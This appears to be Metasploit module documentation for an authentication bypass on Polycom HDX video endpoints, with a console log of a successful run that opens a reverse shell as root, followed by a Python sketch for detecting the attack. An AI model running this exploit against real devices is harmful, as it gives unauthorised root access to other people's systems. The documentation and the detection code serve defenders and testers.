## Vulnerable Application
This module exploits the Polycom HDX video endpoints with software <= 3.0.5.
It was tested on a Polycom HDX 7000 running software version 3.0.3. Telnet port
23 should be accessible, as it is with the factory default configuration.
## Verification Steps
A successful check of the exploit will look like this:
```
msf exploit(psh_auth_bypass) > use exploit/unix/misc/psh_auth_bypass
msf exploit(psh_auth_bypass) > run
[*] Started reverse double SSL handler on 192.168.1.120:4444
[*] 192.168.1.155:23 - Starting Authentication bypass with 6 threads with 100 max connections
[+] 192.168.1.155:23 - 192.168.1.155:23 Successfully exploited the authentication bypass flaw
[+] 192.168.1.155:23 - Sending payload of 178 bytes to 192.168.1.155:40186...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xInxktvgUmm7hPyh;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xInxktvgUmm7hPyh\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.120:4444 -> 192.168.1.155:37728) at 2016-08-01 13:49:06 -0500
[*] 192.168.1.155:23 - Shutting down payload stager listener...
whoami
root
uname -a
Linux polycom.lan 2.6.33.3-rt17.p2.25 #1 PREEMPT RT Wed Aug 3 14:08:40 CDT 2011 ppc unknown
```
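
For defenders, the session above leaves a recognisable network pattern: a burst of connections to TCP/23 on one endpoint, then that endpoint connecting back to the same peer. The following detection sketch is an added example, not part of the module or its documentation; the flow tuple format, thresholds and sample timings are assumptions constructed for illustration, and only the addresses and port 4444 are taken from the output above.

```python
from collections import defaultdict, deque

TELNET = 23

def find_bypass_sessions(flows, burst=20, window=10.0, callback_within=60.0):
    """Flag peers that open >= `burst` telnet connections to one device within
    `window` seconds and then receive a connection back from that device.

    flows: iterable of (epoch_seconds, src_ip, dst_ip, dst_port) tuples
    (assumed format). Thresholds are assumptions to tune per network.
    Returns a list of (peer, device, burst_time, callback_port).
    """
    recent = defaultdict(deque)  # (src, dst) -> telnet timestamps inside window
    bursts = {}                  # (peer, device) -> time the threshold was crossed
    findings = []
    for ts, src, dst, dport in sorted(flows):
        if dport == TELNET:
            q = recent[(src, dst)]
            q.append(ts)
            while ts - q[0] > window:   # drop connections older than the window
                q.popleft()
            if len(q) >= burst:
                bursts.setdefault((src, dst), ts)
            continue
        # Non-telnet flow: is a recently burst device calling back to its peer?
        t0 = bursts.get((dst, src))
        if t0 is not None and ts - t0 <= callback_within:
            findings.append((dst, src, t0, dport))
            del bursts[(dst, src)]      # report each burst once
    return findings

# Constructed sample records; only the addresses and port 4444 come from the page.
SAMPLE_FLOWS = (
    [(1000.0 + i * 0.05, "192.168.1.120", "192.168.1.155", 23) for i in range(100)]
    + [
        (1008.0, "192.168.1.155", "192.168.1.120", 4444),  # device connects back
        (1008.2, "192.168.1.155", "192.168.1.120", 4444),  # second handler connection
        (900.0, "192.168.1.10", "192.168.1.155", 23),      # single admin telnet login
        (905.0, "192.168.1.155", "192.168.1.10", 443),     # unrelated outbound flow
    ]
)

if __name__ == "__main__":
    for peer, device, t0, port in find_bypass_sessions(SAMPLE_FLOWS):
        print(f"ALERT {device}: telnet burst from {peer} at {t0:.2f}, callback to port {port}")
```

A video endpoint rarely initiates connections to a workstation, so the callback half of the rule keeps false positives low even with a loose burst threshold.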